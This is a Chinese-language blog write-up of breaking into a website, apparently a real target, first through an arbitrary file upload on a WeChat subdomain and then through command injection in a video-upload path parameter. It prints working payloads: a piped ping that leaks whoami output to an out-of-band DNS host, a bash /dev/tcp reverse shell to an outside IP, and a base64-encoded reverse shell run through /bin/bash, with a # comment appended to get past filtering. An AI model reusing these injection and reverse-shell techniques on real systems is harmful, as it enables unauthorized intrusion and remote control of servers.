从文件上传到命令注入

主站打开是这样的只有扫码登陆

尝试扫码提示未注册

查看js,网站用了webpack打包

所有请求都在

这个js里面

尝试寻找敏感接口无果

百度site:domain.com

注意到wx1子域,打开这个链接跳转到在微信打开

那就到微信打开,查看功能点发现一处上传,先上传正常图片

改最下面的filename,后缀不变

改上面的filename参数,发现应该是任意文件上传

因为在js中发现php的ueditor(访问文件不存在)

顾认为是php的站,于是上传php,成功上传

访问此php文件直接被下载回来,没有解析(文件在主站下)

此时想到的是这个目录不解析php文件,上传包中有一个path参数,想着将文件上传跨目录到网站根目录

先尝试随便命名一个文件夹,可以创建,访问文件也存在

尝试../ ..跨目录失败

后面尝试各种姿势还是没能跨目录,也尝试修改上传URI

把Image改为File,显示404

改为upload还是在原来那个目录

于是回头看,微信里的功能

找到一处视频上传,把图片改为mp4后缀上传抓包,发包直接报错

此时注意到报错返回的结果,是在执行视频解析的系统命令,注意到下面截图中的两个点

因为path可控那我是不是可以直接拼接命令呢,于是尝试拼接

| ping `whoami`.z889xcgz67006o0itleim0vxcoie63.burpcollaborator.net | 

dnslog收到响应whoami执行结果为root,此时确定存在命令执行

直接反弹shell,服务器没收到

| bash -i >& /dev/tcp/123.*.*.182/8080 0>&1 |

感觉是有特殊字符的原因,于是采用base64编码

tes.txt || echo YmFzaCAtaSA+JiAvZGV2L3*******uNTYuMjQuMTgyLzgwODAgMD4mMQ== | base64 -d | /bin/bash

监听的端口依然没收到响应

于是采用#注释后面的命令

tes.txt || echo YmFzaCAtaSA+JiAvZGV2L3*******uNTYuMjQuMTgyLzgwODAgMD4mMQ== | base64 -d | /bin/bash #

成功反弹shell,发现原来是node.js的站,难怪之前不解析

wx站

主站

此目录记录当时所做之尝试

其实一开始就应该注意到

Express是node.js的一个开发框架就不会在文件上传不解析那里搞那么久了

posted @ 2020-02-25 21:09  cwkiller  阅读(3109)  评论(2编辑  收藏  举报